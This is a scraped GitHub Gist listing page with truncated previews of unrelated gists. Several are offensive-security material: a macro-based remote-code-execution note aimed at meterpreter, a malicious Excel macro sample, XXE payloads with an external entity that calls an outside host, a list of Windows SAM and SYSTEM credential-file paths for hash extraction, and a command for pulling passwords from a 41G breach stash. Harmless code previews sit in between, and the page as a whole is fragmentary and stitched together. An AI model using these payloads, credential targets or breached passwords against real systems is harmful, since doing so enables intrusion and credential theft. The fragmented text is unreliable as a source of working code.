Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Y29udGFjdEBkb21pbmlrYW50YWwubWU=

Dominik Antal galaris

🏠
Y29udGFjdEBkb21pbmlrYW50YWwubWU=
View GitHub Profile
@scottlinux
scottlinux / breachcompilation.txt
Created Dec 19, 2017
1.4 billion password breach compilation wordlist
View breachcompilation.txt
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active Sep 22, 2020
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
View Various-Macro-Based-RCEs.md

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
anonymous
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created Oct 23, 2016
PowerShell malware [posted by @JohnLaTwC]
View gist:d0da355e5c21a122866808d37234cd5d
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
View structs_601_18179.h
class AccountObjectSetCheats
{
bool AutoBattle = false;
AccountobjectSetCheats Type;
int8 SlotLockCheat = 0;
};
class AccountObjectGetProfile
{
std::string Filename;
@lolzballs
lolzballs / HelloWorld.java
Created Mar 22, 2015
Hello World Enterprise Edition
View HelloWorld.java
import java.io.FileDescriptor;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
public class HelloWorld{
private static HelloWorld instance;
public static void main(String[] args){
instantiateHelloWorldMainClassAndRun();
@Marko-M
Marko-M / magento2-performance-toolkit.sh
Last active Jun 6, 2019
Magento2 performance toolkit
View magento2-performance-toolkit.sh
#!/bin/bash
# Generate sample data and trigger Magento2 performance toolkit jMeter test plan.
HOST="magento2.loc"
BASE_PATH="/"
USERS=100
RAMP_PERIOD=300
LOOPS=1
ADMIN_USER="magento2"
ADMIN_PASSWORD="magento2"
@rmondello
rmondello / gist:b933231b1fcc83a7db0b
Created Jan 7, 2015
Exporting (iCloud) Keychain and Safari credentials to a CSV file
View gist:b933231b1fcc83a7db0b

Exporting (iCloud) Keychain and Safari credentials to a CSV file

After my dad died, I wanted to be able to have access any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.

This is the process I used to create a CSV file of his credentials in the format “example.com,user,pass”. This portable format would be pretty easy to import into 1Password or Safari in the future.

The way I went about this isn’t great; it opens up more opportunities for apps to control one’s Mac through Accessibility APIs, it writes plaintext passwords to disk, and it could use some cleaning up. A better approach might leverage the security command line tool that ships with OS X. That said, I found this method to be a fun illustration of what’s possible us

View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@JorgeGT
JorgeGT / plotRTL1090.matlab
Last active May 18, 2020
3D visualization of air traffic through RTL-SDR and MATLAB
View plotRTL1090.matlab
%% PlotRTL1090
% 3D visualization of air traffic through RTL-SDR (dump1090) and MATLAB
% Copyright (C) 2014 Jorge Garcia Tiscar
%
% This program is free software: you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3 of the License, or
% (at your option) any later version (see LICENSE).
%% Initialize
@sckalath
sckalath / windows_blind
Created Jul 14, 2014
Windows Blind Files
View windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system
You can’t perform that action at this time.